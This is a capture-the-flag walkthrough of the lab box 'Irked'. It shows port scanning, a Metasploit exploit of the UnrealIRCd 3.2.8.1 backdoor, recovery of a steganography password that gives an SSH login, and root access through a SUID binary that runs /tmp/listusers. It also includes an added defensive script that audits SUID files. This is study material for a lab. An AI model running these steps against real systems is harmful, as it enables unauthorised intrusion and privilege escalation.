Today, we’re going to solve another CTF machine, “Irked”. It is now a retired box and is accessible to VIP members.

Specifications

  • Target OS: Linux
  • IP Address: 10.10.10.117
  • Difficulty: Easy

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we identify what services are listening behind the IP address.

nmap -p 1-65535 -T4 -A -v -oA intense-tcp 10.10.10.117

22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (EdDSA)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          53832/tcp  status
|_  100024  1          58245/udp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
53832/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

Enumeration

Let’s browse to http://10.10.10.117/

If we take a look at view-source:http://10.10.10.117/ we find nothing but an image.

Steganography

Let’s wget irked.jpg and look for hidden information inside the image.

xxd irked.jpg
strings irked.jpg

If we try to extract information with steghide, it prompts for a password, which is odd for a plain decorative image.

steghide extract -sf irked.jpg

Let’s keep this aside for now and move ahead.

Exploitation

The nmap scan reveals that UnrealIRCd is installed; let’s find out which version it is. We can connect to the IRC server with HexChat and read the server banner.

It reveals UnrealIRCd version 3.2.8.1.

Let’s run searchsploit unrealircd and see if there’s any exploit available for this version.

We have a bunch of exploits; let’s test them.

Metasploit

Let’s fire up msfconsole and search for unreal.

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697

Now let’s run exploit and watch the session come back.

We get a non-interactive shell; let’s upgrade it to a proper TTY using Python.

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

We find the user.txt flag inside /home/djmardov/Documents but don’t have permission to read it.

ircd@irked:/home/djmardov/Documents$ pwd
pwd
/home/djmardov/Documents
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
ircd@irked:/home/djmardov/Documents$ wc -c user.txt
wc -c user.txt
wc: user.txt: Permission denied

To read the flag we need a shell as the djmardov user, but notice that the .backup file in the same directory is world-readable.

ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

It says “steg backup pw”; since the irked.jpg image we found earlier was password protected, we can try extracting its hidden data with this password.

Steghide extracts a pass.txt file successfully, and it contains another password.

Kab6h+m+bbp2J:HG

We can assume that it’s the SSH password for djmardov, because SSH was open. Let’s try our luck.

rph0enix:~# ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password: Kab6h+m+bbp2J:HG

djmardov@irked:~$

Now, we can successfully read user.txt flag.

Privilege Escalation

We can use enumeration scripts to find odd things, or we can simply enumerate manually.

Let’s get started!

djmardov@irked:~$ sudo -l
-bash: sudo: command not found

Let’s find out which services and applications are running, looking for anything interesting.

ps aux | grep root
ps -ef | grep root

Let’s find SUID files.

find / -perm -u=s -type f 2>/dev/null

OR

find / -maxdepth 6 -perm -u=s -type f -exec ls -ld {} \; 2>/dev/null

The file /usr/bin/viewuser stands out because it is not a standard system binary and has been modified recently.

djmardov@irked:~# /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-04-28 22:35 (:0)
djmardov pts/2        2019-05-04 05:58 (10.10.14.6)

viewuser executes /tmp/listusers, and because viewuser is SUID root, our /tmp/listusers runs as root and opens a root shell when we execute /usr/bin/viewuser again.

And we have the root flag.
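The defender-side counterpart to the SUID hunt above, as an added example that is not part of the original writeup: a small Python audit that flags SUID binaries which were modified recently or embed a path under /tmp, /var/tmp or /dev/shm, the two traits that would have surfaced viewuser's dependency on /tmp/listusers. The path regex and the 30-day window are my assumptions.

```python
# Added example (not from the original writeup): audit SUID binaries for the two
# traits seen with /usr/bin/viewuser, recent mtime and a path into a writable dir.
import os
import re
import stat
import sys
import time

# Paths an unprivileged user controls; a SUID root binary that executes
# anything from here hands that user root (the viewuser -> /tmp/listusers case).
WRITABLE_PATH_RE = re.compile(rb"(?:/tmp|/var/tmp|/dev/shm)/[A-Za-z0-9._-]+")

def refs_in(data):
    """Embedded strings pointing into world-writable dirs, e.g. '/tmp/listusers'."""
    return sorted({m.decode() for m in WRITABLE_PATH_RE.findall(data)})

def is_recent(mtime, now, days=30):
    """True if mtime falls within the last `days` days relative to `now`."""
    return (now - mtime) < days * 86400

def is_suid(path):
    """True for a regular file (not a symlink) with the setuid bit set."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)

def audit(roots, days=30, now=None):
    """Return (path, owner_uid, recently_modified, refs) per suspicious SUID file."""
    now = time.time() if now is None else now
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    if not is_suid(path):
                        continue
                    st = os.stat(path)
                    with open(path, "rb") as fh:
                        refs = refs_in(fh.read())
                except OSError:  # unreadable or vanished file: skip it
                    continue
                recent = is_recent(st.st_mtime, now, days)
                if recent or refs:
                    findings.append((path, st.st_uid, recent, refs))
    return findings

if __name__ == "__main__":
    for path, uid, recent, refs in audit(sys.argv[1:] or ["/usr/bin"]):
        note = "recently modified; " if recent else ""
        print(f"{path} (owner uid {uid}): {note}{' '.join(refs) or 'no writable-dir refs'}")
```

Run it as an unprivileged user against /usr/bin and /usr/local/bin; a SUID root file that is both new and references /tmp is the finding worth investigating first.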

root@irked:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root@irked:~# wc -c /root/root.txt
33 /root/root.txt